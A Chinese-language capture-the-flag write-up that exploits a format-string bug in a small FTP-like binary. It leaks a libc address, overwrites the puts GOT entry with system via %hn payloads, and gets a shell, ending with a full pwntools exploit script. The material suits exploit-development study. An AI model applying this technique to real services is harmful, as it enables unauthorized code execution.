首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。
首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。
这个时候我们发现get_file函数中显然有一个格式化字符漏洞。
这种漏洞会导致我们可以控制任意内存的读写,因此我们考虑由此下手,构造system(/bin/sh)拿到shell
由于show_dir为反向输出,并且中间没有分隔符号,所以我们对输入的文件名下手,构造/bin/sh,那么自然,我们就可以劫持puts函数为system函数
然而程序本身没有system函数的入口,所以我们要找到一种办法将GOT中system函数的地址覆盖到puts函数中
在Linux终端,通过输入:
readelf -r pwn
我们可以查看到puts在运行的时候实际地址被存放到的地址
所以我们下一步就是找到system的实际地址,然后利用格式化字符漏洞,将其写入0x804a028中
这里参考了一下leehaming的博客https://blog.csdn.net/lee_ham/article/details/82556622,利用以下公式,可以算出system在运行时的实际地址
libc_base = __libc_start_main_addr - __libc_start_main_offset
system_addr = libc_base + system_offset
用gdb-peda在printf函数处下断点,检查栈。(命令为 stack 100)
我们发现了__libc_start_main+247为0xffffd03c,又因为栈顶位置与0xffffd03c距离为364,364/4=91,所以我们可以直接输入%91$x来表示,于是__libc_start_main就可以求出来了
通过libc-database可以知道system函数相关的偏移值,然后system函数的地址我们也可以求出
接下来就是将地址写入puts的临时地址位置中。
为了加快速度,我们可以考虑将system的地址(假设为0xaabbccdd)分成两部分,低地址放进 0x804a028,高地址放进0x804a02a。
构造payload
payload1 = p32(puts_got_addr) + '%%%dc' % ((system_addr & 0xffff)-4) + '%7$hn'
payload2 = p32(puts_got_addr+2) + '%%%dc' % ((system_addr>>16 & 0xffff)-4) + '%7$hn'
之所以是%7$hn,是因为我们在程序停止于printf函数时,打印栈发现我们需要改变的地方的偏移量为7。
exp程序:
from pwn import *
context.log_level = 'debug'
#prog = remote('106.2.25.7',8001)
prog=process("./pwn")
def putfile( prog , filename , content ) :
print 'putting ' , content
prog.sendline('put')
prog.recvuntil(':')
prog.sendline(filename)
prog.recvuntil(':')
prog.sendline(content)
prog.recvuntil('ftp>')
def getfile(prog , filename ) :
prog.sendline('get')
prog.recvuntil(':')
prog.sendline(filename)
return prog.recv(2048)
prog.recv(2048)
prog.sendline('rxraclhm')
prog.recv(2048)
putfile(prog,'sh;','%91$x')
res = getfile( prog , 'sh;')
print res
mainadd = int(res[:8], 16)-247
sysadd = mainadd - 0x18540 + 0x3ada0
print 'system addr ' , hex(sysadd)
putsadd = 0x0804a028
payload1 = p32(putsadd) + '%%%dc' % ((sysadd & 0xffff)-4) + '%7$hn'
putfile(prog , 'in/' , payload1)
getfile(prog , 'in/')
prog.recvuntil('ftp>')
payload2 = p32(putsadd+2) + '%%%dc' % ((sysadd>>16 & 0xffff)-4) + '%7$hn'
putfile(prog, '/b' , payload2)
getfile(prog,'/b')
prog.recvuntil('ftp>')
prog.sendline('dir')
prog.interactive()